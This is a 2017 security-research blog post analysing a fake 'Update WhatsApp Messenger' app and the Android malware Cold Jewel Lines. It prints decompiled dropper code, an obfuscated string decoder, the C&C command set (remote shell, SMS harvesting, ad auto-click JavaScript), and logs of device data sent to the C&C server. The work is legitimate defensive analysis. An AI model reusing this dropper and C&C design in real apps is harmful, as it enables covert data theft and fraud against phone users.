Nov 21, 2017

Fake WhatsApp… and the Real Malware zLabs Discovered

Matteo Favaro
Share this blog

On November 3, 2017, some users of Reddit noticed two WhatsApp applications with the same developer name “WhatsApp Inc.” and started to investigate what looked like a fake update for the WhatsApp application. They quickly realized that the application has been downloaded more than one million times.

As a part of Zimperium’s zLabs research team, I analyzed the Fake WhatsApp… and then discovered another threat through an ad served up by it: malware called “Cold Jewel Lines”. The analysis of both the Fake WhatsApp and secondhand malware, Cold Jewel Lines, is the focus of this post.

Fake WhatsApp Metadata:

Application Name: Update WhatsApp Messenger

Company Name: WhatsApp Inc. (with a trailing NO-BREAK SPACE)

Package Name: whyuas.fullversion.update2017

Play Store Link: https://play.store.com/store/apps/details?id=whyuas.fullversion.update2017

SHA256: 80fe0de24e58eb1c485d55c94d20ffd710fc4b8a05f2c20d9d0d42cabb683fad

Behavior

After installation, the application can’t be seen on the launcher because the developer set an empty app_name value and a transparent ic_launcher.png icon; nevertheless it can be started from the launcher by clicking on the “empty” icon present at the end of the list of applications in the launcher. In the Android settings, the application can be easily spotted and uninstalled also if it doesn’t have a name.

After launching it, different advertisements are shown to the user. By clicking the install button, the user is redirected to the Play Store to install the displayed application. It’s clear that the main focus of the app is Ad click fraud. But during execution, the user can also select different “Update servers” from which the fake WhatsApp update should theoretically be downloaded.

The code simply loads the index1.html to index11.html from the assets and expects the user to click the download button. The page displays a download server number, a download button with the text “Download Update” plus the filename and size of the APK the user expects to download. Once clicked, the button redirects to a shortened URL offered by bitly.com (which is now marking the link as potentially harmful).

The following is a video showing the behavior of the application:

YouTube video

Cold Jewel Lines Analysis: Secondhand Malware

During the Fake WhatsApp investigation, one of the ads displayed a really suspicious application. As can be seen in the behavior video, the first “Install” button loads a Play Store application named Cold Jewel Lines.

Summary of malicious activity:

After a drop phase, the malware main goals are:

  • Opening a communication channel with a C&C server waiting for commands;
  • Execute Ads-autoclicking activities;
  • Exfiltrate sensitive information from the device;
  • Parse and extract information from received SMS;
  • Possibly execute other malicious payloads (e.g. exploits);
  • Possibly execute shell commands to extract additional data;

App Metadata:

Application Name: Cold Jewel Lines

Company Name: kbtjgbqv

Package Name: en.cold.jewel.th.lines

Play Store Link: https://play.google.com/store/apps/details?id=en.cold.jewel.th.lines

Archived Play Store Page: https://web.archive.org/web/20171120165502/https://play.google.com/store/apps/details?id=en.cold.jewel.th.lines

SHA256: 1daa6ff47d451107b843be4b31da6e5546c00a164dc5cfbf995bac24fef3bc6d

The application has been reported to Google on November 20, 2017 and has been removed on November 21, 2017.

Behavior

The application itself is a fully working game, and the malware is executed as soon as the application is started. In fact, the developer decided to inject a malicious call to the infiltration.outcry class from the android.support.multidex.MultiDexApplication class. In particular, the infected method is attachBaseContext. During the statical initialization of the outcry object, the library libseconhand.so is loaded and then the native method init is called, passing the Context and the string “NzZmBCp6IFcbCSQPb2NWa2ViBWNKekMGew==” arguments. The “NzZmBCp6IFcbCSQPb2NWa2ViBWNKekMGew==” string will be later referenced by the malware as apiKey.

public class MultiDexApplication extends Application {
protected void attachBaseContext(Context base) {
super.attachBaseContext(base);
outcry infiltration_outcry = new outcry(this, "NzZmBCp6IFcbCSQPb2NWa2ViBWNKekMGew==");
MultiDex.install(this);
}
}

package infiltration;
import android.content.Context;
public class outcry {
public outcry(Context context, String str) {
try {
init(context, str);
} catch (Exception e) {
e.printStackTrace();
}
}
private native void init(Context context, String str);
static {
System.loadLibrary("secondhand");
}
}
view raw outcry.java hosted with ❤ by GitHub

The libsecondhand.so library is available for ARM, ARM64, x86, x86-64, MIPS and MIPS64, and the only purpose is to drop a malicious APK and dynamically load the embedded classes.dex. All the library strings and the embedded malicious APK are encoded with block-XOR encryption.

The drop phase is executed entirely by the native code using JNI functions:

  1. A random UUID is generated and the malicious APK is decoded and dropped in the files folder;
  2. a DexClassLoader object is created using the path to the dropped APK as argument;
  3. the ClassLoader.loadClass method is called with infiltration.Main as argument;
  4. the static method init of the infiltration.Main class is retrieved and called by the native code before quitting.

All the strings/variables/classes in the dropped classes.dex are obfuscated; the strings can be retrieved decompiling the code (e.g. with jadx) and executing the StringDecoder.py script that can be found in the Attachments section.

package infiltration;
public class OpJii28pAi06ZoYxrJlBF2gW {
public static final String vvgQM33AjqPJZjX = vvgQM33AjqPJZjX(new char[]{'⨪', '', '轜', '羈'});
private static String vvgQM33AjqPJZjX(char[] cArr) {
int[] iArr = new int[]{
-1494341050, -321722657, -1896771781, 1003847675, -325403554, -1813609550, -1092818872, -1070330870, -1575768214, 334986944, -921023518,
-1150359686, -1410598707, 455405768, 387562126, -1576260892, 194540770, 783183183, 867211449, -653784908, -477948115, 744374468, -631604211,
-1906986523, 1344563667, -1177096988, 1562966533, 1543717646, 485560396, 1192331103, -1261876285, 188808610, 244334934, -1643061573,
1562368800, -1446227597, 1772842028, 1000835448, 1080495365, -1388086664, -2047443721, 174932853, -1816142600, -1930512689, 1393783940,
1675771282, -1342693895, -942122748, 1609254712, 713376661, -1187810161, -86164845, 272709440, 1015798865, -1117692387, 2096321195,
-2031804916, -1472608252
};
char[] cArr2 = new char[cArr.length];
for (int i = 0; i < cArr2.length; i++) {
int length = i % iArr.length;
cArr2[i] = (char) (iArr[length] ^ cArr[i]);
}
return new String(cArr2);
}
}

The init method is clearly the main entry point for the malicious code and executes some tasks before spawning a background service that will carry on the malicious activities:

  1. The init method receives the path to the dropped APK and the apiKey string;
  2. the infiltration.Main class is basically a slightly modified version of the Android system android.support.multidex.MultiDex class and once the dropped classes.dex is fully loaded the dropped files are deleted from the file system;
  3. a SharedPreferences file F.xml is created and the pkgName and apiKey are saved;
  4. the service implemented in the infiltration.rate class is started.

The rate class will handle the communication with the C&C server (systemofram.com) and will execute all the received tasks; a basic mechanism of request/response with acknowledge of the received or completed task is in place and each task has its own id. All the messages have a JSON structure and before being sent are encrypted.

The downfall class it’s a BroadcastReceiver and will handle the intents with the following main actions:

  • android.provider.Telephony.SMS_RECEIVED: extracts the sender and the body from an SMS message and, based on the receiveSms and smsFilters commands (see below) will parse and match their contents.
  • com.android.vending.INSTALL_REFERRER: sets the referrer field of another class object that will be later used during Ads clicking functionalities.
  • android.net.conn.CONNECTIVITY_CHANGE: determines the current connectivity state and informs the server about it (if possible).
  • c: if the waiting interval is not over, it delays the intent by the remaining time.

C&C Commands

The following list briefly explains the commands supported by the malware:

  • init: It’s the initialization command sent by the client. The private key is sent to the server; the server will answer acknowledging the private key and requesting the info to the client. The client will finalize the message exchange acknowledging the server of the correct termination of the init task. The other messages will use the same acknowledging system.
  • ok: It’s a message sent by the server to notify the client that a blob of data has been correctly received.
  • url: The server sends an URL to the client, which saves it in an instance of a class which implements a getter that unfortunately is not used anywhere. Looks like an in-progress functionality.
  • info: The server requests information about the device, the client will send the following information: version, androidUuid, apiKey, appId, operator, WiFi, Battery, locale, manufacturer, model, androidVersion, screen, forGooglePlay, debug, userAgent, androidSdkVersion, androidBuildVersion, fingerprint, hardware, device, wifiNetworks (name, mac, level), currentWifiNetwork, mobileDataEnable, rootAvailable, simInfo, installedApps, simCount, androidId, imei, imsi, isPhone, referrer. This kind of information can be (and is) used to fingerprint the device and execute specific actions.
  • interval: The server sends the amount of time to make the client sleep; it seems to be in the order of minutes.
  • webClick: The server sends an URL, a list of URL regexes and a list of JavaScript codes to be loaded by the client. The client will open the URL on an hidden WebView with JavaScript enabled; if the currently loaded URL matches the regexes, the corresponding JavaScript code is executed. An example of JavaScript code executed in the WebView is “document.getElementById(‘actionLink’).click();“, it’s clear that auto-clicking functionalities are in place. The results of the loaded URLs (or error messages if they occur) are sent back to the server. The auto-click action it’s executed several times during the day.
  • receiveSms: Enables or disables the SMS filtering; if the device doesn’t have a SIM or available connection to receive messages, the code will try to detect the possibility to enable it.
  • smsFilters: The server sends a list of tuples made of regural expressions to match the received SMS messages; phoneExp are regexes used to match the sender of the SMS (be it a number or a service name), while textExp are regexes used to match the body of the text message and extract useful information from it. Once the matching and information extraction have been executed, the data are sent back to the server.
  • silentMode: The server sends a huge amount of time to make the client sleep; it’s expected to be hours or days.
  • server: The server notifies the client about a new C&C server.
  • shell: The server sends a list of commands to be executed by the device. It looks like that if root is available on the device, the su shell can be used, otherwise the commands are executed with sh -c. The results (or error messages if they occur) are sent back to the server.
  • download: The server specifies a file to be downloaded by the client. Although none of the messages contained a download action item, we can expect the server to execute a fingerprinting phase with the info command, download a compatible exploit to the device, and execute it with the shell command.

The communication with the server is encrypted, but a simple Xposed module has been developed to hook the drop phase, log all the exchanged messages and fake the root status of the device. It can be further modified to tamper the communication with the C&C server if needed, because the hooked methods give access to the sent and received JSON strings.

The communication with the C&C server has been monitored for two days, but only a subset of the commands have been detected. In particular, no occurrence of the silentMode, server, shell and download commands was detected. In the next snippet of code, you will find the logged messages dialog, showing how the malware is able to:

  • Exfiltrate sensitive data: Personally identifiable data  such as IMEI, IMSI, androidUuid, operator, WiFi networks, MACs, manufacturer, root status, user agent and others are all sent to the server;
  • SMS message parsing: The server sends to the app a list of regexes to be applied to the received SMS to extract information; messages received from Billinfo, 1232111, o2.Team, o2.Info, Bouygues, Orange and others services matched via regexes are targeted;
  • Auto-click functionalities: The server sends an URL, the headers, the user agent and the JavaScript code to be executed by the client.

11-19 15:35:43.870 I/Xposed (18830): [+] Target application found: en.cold.jewel.th.lines
11-19 15:35:43.943 I/Xposed (18830): [!] BaseDexClassLoader has been called: /data/data/en.cold.jewel.th.lines/files/e0349410-3444-41df-945d-660d3bf6f21c.apk
11-19 15:35:43.943 I/Xposed (18830): [!] openDexFile has been called: /data/data/en.cold.jewel.th.lines/files/e0349410-3444-41df-945d-660d3bf6f21c.apk, /data/data/en.cold.jewel.th.lines/files/e0349410-3444-41df-945d-660d3bf6f21c.dex
11-19 15:35:44.334 I/Xposed (18830): [!] ClassLoader.loadClass has been called: infiltration.Main$V19
11-19 15:35:44.334 I/Xposed (18830): [i] Installing (classToHook) hook on: infiltration.Main$V19.install(ClassLoader c, List l, File f)
11-19 15:35:44.340 I/Xposed (18830): [+] install (V19) hit!
11-19 15:35:44.341 I/Xposed (18830): [!] openDexFile has been called: /data/data/en.cold.jewel.th.lines/files/e0349410-3444-41df-945d-660d3bf6f21c.apk, /data/data/en.cold.jewel.th.lines/files/e0349410-3444-41df-945d-660d3bf6f21c.dex
11-19 15:35:44.349 I/Xposed (18830): [i] Installing hook on: infiltration.oI2nTR2.OpJii28pAi06ZoYxrJlBF2gW(String s)
11-19 15:35:44.352 I/Xposed (18830): [i] Installing hook on: infiltration.AdfdI9FaQBbbW3Hgur24m6n0.vvgQM33AjqPJZjX(String s, PrivateKey k)
11-19 15:35:44.355 I/Xposed (18830): [i] Installing hook on: infiltration.AdfdI9FaQBbbW3Hgur24m6n0.vvgQM33AjqPJZjX(String s, PublicKey k)
11-19 15:35:44.356 I/Xposed (18830): [i] Installing hook (classToHook) on: infiltration.AdfdI9FaQBbbW3Hgur24m6n0.jNWow5lMF5gpMRlovjqsFg()
11-19 15:35:44.377 I/Xposed (18830): [!] MultiDex.install has been called
11-19 15:35:44.873 I/Xposed (18830): [!] BaseDexClassLoader has been called: /system/app/WebViewGoogle/WebViewGoogle.apk
11-19 15:35:44.873 I/Xposed (18830): [!] openDexFile has been called: /system/app/WebViewGoogle/WebViewGoogle.apk, null
11-19 15:35:46.480 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"init","data":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDHNyUbVMrZg7wPPhBja8vwWDx5DXMy7wkee\/yi\novuCUhP4ZI4NwcpnuSjbA66I9babaFVBR0SwbBVzXcBLPZZzYNsWmbCk46e4uPKVpbA+miyMO+SP\nHQ+6\/YdzCxGejiwqLKlY67GZZcJSYDJh07juNMoMO6281fjtc35tHkmTgwIDAQAB\n"}
11-19 15:35:53.050 I/Xposed (18830): [+] SERVER: [{"id":221383,"name":"init","params":{"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDej/PFHz31qkOFoB3eYOv5pLTt\nBf8w+5nJxBRfbJM88dm9uRqtzhV+ba+ppPwR2Hros5MODjo5pLo0fDgPP1ObajZ4\nJ+hPFI0oqIXA1ll58H2r+ZiJLwToXwKHe0pwUNCIqOsew0jJ1hN0sUT9h0St96gd\nxRXbDyFz3X4eAO7tfwIDAQAB"}},{"id":369544,"name":"info"}]
11-19 15:35:53.132 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:35:53 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"221383\\\",\\n \\\"name\\\": \\\"init\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 15:35:53.337 I/Xposed (18830): [+] Faking root state
11-19 15:35:53.549 I/Xposed (18830): [+] SERVER: [{"id":552512,"name":"OK"}]
11-19 15:35:53.578 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:35:53 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"369544\\\",\\n \\\"name\\\": \\\"info\\\",\\n \\\"result\\\": 0,\\n \\\"data\\\": \\\"{\\\\n \\\\\\\"version\\\\\\\": 34,\\\\n \\\\\\\"androdUuid\\\\\\\": \\\\\\\"8c20c154-7c53-458e-977d-cb8c6ea03097\\\\\\\",\\\\n \\\\\\\"apiKey\\\\\\\": \\\\\\\"NzZmBCp6IFcbCSQPb2NWa2ViBWNKekMGew==\\\\\\\",\\\\n \\\\\\\"appId\\\\\\\": \\\\\\\"en.cold.jewel.th.lines\\\\\\\",\\\\n \\\\\\\"operator\\\\\\\": \\\\\\\" ()\\\\\\\",\\\\n \\\\\\\"WiFi\\\\\\\": true,\\\\n \\\\\\\"Battery\\\\\\\": 70,\\\\n \\\\\\\"locale\\\\\\\": \\\\\\\"it_IT\\\\\\\",\\\\n \\\\\\\"manufacturer\\\\\\\": \\\\\\\"motorola\\\\\\\",\\\\n \\\\\\\"model\\\\\\\": \\\\\\\"XT1032\\\\\\\",\\\\n \\\\\\\"androidVersion\\\\\\\": \\\\\\\"5.1\\\\\\\",\\\\n \\\\\\\"screen\\\\\\\": \\\\\\\"720 x 1184, 320, 2.00\\\\\\\",\\\\n \\\\\\\"forGooglePlay\\\\\\\": false,\\\\n \\\\\\\"debug\\\\\\\": false,\\\\n \\\\\\\"userAgent\\\\\\\": \\\\\\\"Mozilla\\\\\\\\\\\\\\\/5.0 (Linux; Android 5.1; XT1032 Build\\\\\\\\\\\\\\\/LMY47M.M005) AppleWebKit\\\\\\\\\\\\\\\/537.36 (KHTML, like Gecko) Version\\\\\\\\\\\\\\\/4.0 Chrome\\\\\\\\\\\\\\\/39.0.0.0 Mobile Safari\\\\\\\\\\\\\\\/537.36\\\\\\\",\\\\n \\\\\\\"androidSdkVersion\\\\\\\": 22,\\\\n \\\\\\\"androidBuildVersion\\\\\\\": \\\\\\\"3.4.42-g2b8cf4a-00009-g8ea813e\\\\\\\",\\\\n \\\\\\\"fingerprint\\\\\\\": \\\\\\\"motorola\\\\\\\\\\\\\\\/falcon_gpe\\\\\\\\\\\\\\\/falcon_umts:5.1\\\\\\\\\\\\\\\/LMY47M.M005\\\\\\\\\\\\\\\/10:user\\\\\\\\\\\\\\\/release-keys\\\\\\\",\\\\n \\\\\\\"hardware\\\\\\\": \\\\\\\"qcom\\\\\\\",\\\\n \\\\\\\"device\\\\\\\": \\\\\\\"falcon_umts\\\\\\\",\\\\n \\\\\\\"wifiNetworks\\\\\\\": [\\\\n {\\\\n \\\\\\\"name\\\\\\\": \\\\\\\"NETGEAR-AAA\\\\\\\",\\\\n \\\\\\\"mac\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"level\\\\\\\": -69\\\\n },\\\\n {\\\\n \\\\\\\"name\\\\\\\": \\\\\\\"NETGEAR12\\\\\\\",\\\\n \\\\\\\"mac\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"level\\\\\\\": -82\\\\n }\\\\n ],\\\\n \\\\\\\"currentWifiNetwork\\\\\\\": \\\\\\\"\\\\\\\\\\\\\\\"NETGEAR12\\\\\\\\\\\\\\\" (20:4e:7f:af:6a:d4)\\\\\\\",\\\\n \\\\\\\"mobileDataEnable\\\\\\\": true,\\\\n \\\\\\\"rootAvailable\\\\\\\": false,\\\\n \\\\\\\"simInfo\\\\\\\": [],\\\\n \\\\\\\"installedApps\\\\\\\": [\\\\n \\\\\\\"stericson.busybox\\\\\\\",\\\\n \\\\\\\"en.cold.jewel.th.lines\\\\\\\",\\\\n \\\\\\\"de.robv.android.xposed.installer\\\\\\\",\\\\n \\\\\\\"com.hook.hooker\\\\\\\"\\\\n ],\\\\n \\\\\\\"simCount\\\\\\\": 1,\\\\n \\\\\\\"androidId\\\\\\\": \\\\\\\"012345678abcdef0\\\\\\\",\\\\n \\\\\\\"imei\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"imsi\\\\\\\": \\\\\\\"12345\\\\\\\",\\\\n \\\\\\\"isPhone\\\\\\\": true,\\\\n \\\\\\\"referrer\\\\\\\": \\\\\\\"\\\\\\\"\\\\n}\\\"\\n}\"\n }\n]"}
11-19 15:35:55.813 I/Xposed (18830): [+] SERVER: [{"id":715286,"name":"receiveSms","params":{"enable":false}},{"id":301436,"name":"smsFilters","params":{"filters":[{"phoneExp":"[0-9]{4}","textExp":".*"},{"phoneExp":"[0-9]{3}","textExp":".*"},{"phoneExp":"[0-9]{5}","textExp":".*"},{"phoneExp":"[0-9]{6}","textExp":".*"},{"phoneExp":"[0-9]{7}","textExp":".*"},{"phoneExp":".*9121","textExp":".*"},{"phoneExp":"C[0-9]{8}","textExp":".*"},{"phoneExp":".*Billinfo.*","textExp":".*"},{"phoneExp":"1232111","textExp":".*"},{"phoneExp":"o2.Team","textExp":".*"},{"phoneExp":"o2.Info","textExp":".*"},{"phoneExp":".*Bouygues.*","textExp":".*"},{"phoneExp":".*Orange.*","textExp":".*"}]}},{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a1196cb092c3","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 6.0.1; SM-N910T Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":143452,"name":"interval","params":{"interval":60}},{"id":876723,"name":"info"},{"id":964199,"name":"OK"},{"id":635363,"name":"OK"}]
11-19 15:35:55.881 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:35:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"715286\\\",\\n \\\"name\\\": \\\"receiveSms\\\",\\n \\\"result\\\": 1,\\n \\\"error\\\": \\\"[\\\\n \\\\\\\"enable: already disabled\\\\\\\"\\\\n]\\\"\\n}\"\n }\n]"}
11-19 15:35:56.437 I/Xposed (18830): [+] Faking root state
11-19 15:35:56.532 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:35:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"715286\\\",\\n \\\"name\\\": \\\"receiveSms\\\",\\n \\\"result\\\": 1,\\n \\\"error\\\": \\\"[\\\\n \\\\\\\"enable: already disabled\\\\\\\"\\\\n]\\\"\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"301436\\\",\\n \\\"name\\\": \\\"smsFilters\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"143452\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"876723\\\",\\n \\\"name\\\": \\\"info\\\",\\n \\\"result\\\": 0,\\n \\\"data\\\": \\\"{\\\\n \\\\\\\"version\\\\\\\": 34,\\\\n \\\\\\\"androdUuid\\\\\\\": \\\\\\\"8c20c154-7c53-458e-977d-cb8c6ea03097\\\\\\\",\\\\n \\\\\\\"apiKey\\\\\\\": \\\\\\\"NzZmBCp6IFcbCSQPb2NWa2ViBWNKekMGew==\\\\\\\",\\\\n \\\\\\\"appId\\\\\\\": \\\\\\\"en.cold.jewel.th.lines\\\\\\\",\\\\n \\\\\\\"operator\\\\\\\": \\\\\\\" ()\\\\\\\",\\\\n \\\\\\\"WiFi\\\\\\\": true,\\\\n \\\\\\\"Battery\\\\\\\": 70,\\\\n \\\\\\\"locale\\\\\\\": \\\\\\\"it_IT\\\\\\\",\\\\n \\\\\\\"manufacturer\\\\\\\": \\\\\\\"motorola\\\\\\\",\\\\n \\\\\\\"model\\\\\\\": \\\\\\\"XT1032\\\\\\\",\\\\n \\\\\\\"androidVersion\\\\\\\": \\\\\\\"5.1\\\\\\\",\\\\n \\\\\\\"screen\\\\\\\": \\\\\\\"720 x 1184, 320, 2.00\\\\\\\",\\\\n \\\\\\\"forGooglePlay\\\\\\\": false,\\\\n \\\\\\\"debug\\\\\\\": false,\\\\n \\\\\\\"userAgent\\\\\\\": \\\\\\\"Mozilla\\\\\\\\\\\\\\\/5.0 (Linux; Android 5.1; XT1032 Build\\\\\\\\\\\\\\\/LMY47M.M005) AppleWebKit\\\\\\\\\\\\\\\/537.36 (KHTML, like Gecko) Version\\\\\\\\\\\\\\\/4.0 Chrome\\\\\\\\\\\\\\\/39.0.0.0 Mobile Safari\\\\\\\\\\\\\\\/537.36\\\\\\\",\\\\n \\\\\\\"androidSdkVersion\\\\\\\": 22,\\\\n \\\\\\\"androidBuildVersion\\\\\\\": \\\\\\\"3.4.42-g2b8cf4a-00009-g8ea813e\\\\\\\",\\\\n \\\\\\\"fingerprint\\\\\\\": \\\\\\\"motorola\\\\\\\\\\\\\\\/falcon_gpe\\\\\\\\\\\\\\\/falcon_umts:5.1\\\\\\\\\\\\\\\/LMY47M.M005\\\\\\\\\\\\\\\/10:user\\\\\\\\\\\\\\\/release-keys\\\\\\\",\\\\n \\\\\\\"hardware\\\\\\\": \\\\\\\"qcom\\\\\\\",\\\\n \\\\\\\"device\\\\\\\": \\\\\\\"falcon_umts\\\\\\\",\\\\n \\\\\\\"wifiNetworks\\\\\\\": [\\\\n {\\\\n \\\\\\\"name\\\\\\\": \\\\\\\"NETGEAR-AAA\\\\\\\",\\\\n \\\\\\\"mac\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"level\\\\\\\": -69\\\\n },\\\\n {\\\\n \\\\\\\"name\\\\\\\": \\\\\\\"NETGEAR12\\\\\\\",\\\\n \\\\\\\"mac\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"level\\\\\\\": -83\\\\n }\\\\n ],\\\\n \\\\\\\"currentWifiNetwork\\\\\\\": \\\\\\\"\\\\\\\\\\\\\\\"NETGEAR12\\\\\\\\\\\\\\\" (20:4e:7f:af:6a:d4)\\\\\\\",\\\\n \\\\\\\"mobileDataEnable\\\\\\\": true,\\\\n \\\\\\\"rootAvailable\\\\\\\": false,\\\\n \\\\\\\"simInfo\\\\\\\": [],\\\\n \\\\\\\"installedApps\\\\\\\": [\\\\n \\\\\\\"stericson.busybox\\\\\\\",\\\\n \\\\\\\"en.cold.jewel.th.lines\\\\\\\",\\\\n \\\\\\\"de.robv.android.xposed.installer\\\\\\\",\\\\n \\\\\\\"com.hook.hooker\\\\\\\"\\\\n ],\\\\n \\\\\\\"simCount\\\\\\\": 1,\\\\n \\\\\\\"androidId\\\\\\\": \\\\\\\"012345678abcdef0\\\\\\\",\\\\n \\\\\\\"imei\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"imsi\\\\\\\": \\\\\\\"12345\\\\\\\",\\\\n \\\\\\\"isPhone\\\\\\\"
11-19 15:36:56.262 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"15:35:55 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"715286\\\",\\n \\\"name\\\": \\\"receiveSms\\\",\\n \\\"result\\\": 1,\\n \\\"error\\\": \\\"[\\\\n \\\\\\\"enable: already disabled\\\\\\\"\\\\n]\\\"\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"301436\\\",\\n \\\"name\\\": \\\"smsFilters\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"143452\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"15:35:56 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"876723\\\",\\n \\\"name\\\": \\\"info\\\",\\n \\\"result\\\": 0,\\n \\\"data\\\": \\\"{\\\\n \\\\\\\"version\\\\\\\": 34,\\\\n \\\\\\\"androdUuid\\\\\\\": \\\\\\\"8c20c154-7c53-458e-977d-cb8c6ea03097\\\\\\\",\\\\n \\\\\\\"apiKey\\\\\\\": \\\\\\\"NzZmBCp6IFcbCSQPb2NWa2ViBWNKekMGew==\\\\\\\",\\\\n \\\\\\\"appId\\\\\\\": \\\\\\\"en.cold.jewel.th.lines\\\\\\\",\\\\n \\\\\\\"operator\\\\\\\": \\\\\\\" ()\\\\\\\",\\\\n \\\\\\\"WiFi\\\\\\\": true,\\\\n \\\\\\\"Battery\\\\\\\": 70,\\\\n \\\\\\\"locale\\\\\\\": \\\\\\\"it_IT\\\\\\\",\\\\n \\\\\\\"manufacturer\\\\\\\": \\\\\\\"motorola\\\\\\\",\\\\n \\\\\\\"model\\\\\\\": \\\\\\\"XT1032\\\\\\\",\\\\n \\\\\\\"androidVersion\\\\\\\": \\\\\\\"5.1\\\\\\\",\\\\n \\\\\\\"screen\\\\\\\": \\\\\\\"720 x 1184, 320, 2.00\\\\\\\",\\\\n \\\\\\\"forGooglePlay\\\\\\\": false,\\\\n \\\\\\\"debug\\\\\\\": false,\\\\n \\\\\\\"userAgent\\\\\\\": \\\\\\\"Mozilla\\\\\\\\\\\\\\\/5.0 (Linux; Android 5.1; XT1032 Build\\\\\\\\\\\\\\\/LMY47M.M005) AppleWebKit\\\\\\\\\\\\\\\/537.36 (KHTML, like Gecko) Version\\\\\\\\\\\\\\\/4.0 Chrome\\\\\\\\\\\\\\\/39.0.0.0 Mobile Safari\\\\\\\\\\\\\\\/537.36\\\\\\\",\\\\n \\\\\\\"androidSdkVersion\\\\\\\": 22,\\\\n \\\\\\\"androidBuildVersion\\\\\\\": \\\\\\\"3.4.42-g2b8cf4a-00009-g8ea813e\\\\\\\",\\\\n \\\\\\\"fingerprint\\\\\\\": \\\\\\\"motorola\\\\\\\\\\\\\\\/falcon_gpe\\\\\\\\\\\\\\\/falcon_umts:5.1\\\\\\\\\\\\\\\/LMY47M.M005\\\\\\\\\\\\\\\/10:user\\\\\\\\\\\\\\\/release-keys\\\\\\\",\\\\n \\\\\\\"hardware\\\\\\\": \\\\\\\"qcom\\\\\\\",\\\\n \\\\\\\"device\\\\\\\": \\\\\\\"falcon_umts\\\\\\\",\\\\n \\\\\\\"wifiNetworks\\\\\\\": [\\\\n {\\\\n \\\\\\\"name\\\\\\\": \\\\\\\"NETGEAR-AAA\\\\\\\",\\\\n \\\\\\\"mac\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"level\\\\\\\": -69\\\\n },\\\\n {\\\\n \\\\\\\"name\\\\\\\": \\\\\\\"NETGEAR12\\\\\\\",\\\\n \\\\\\\"mac\\\\\\\": \\\\\\\"DE:AD:BA:BE:BE:EF\\\\\\\",\\\\n \\\\\\\"level\\\\\\\": -83\\\\n }\\\\n ],\\\\n 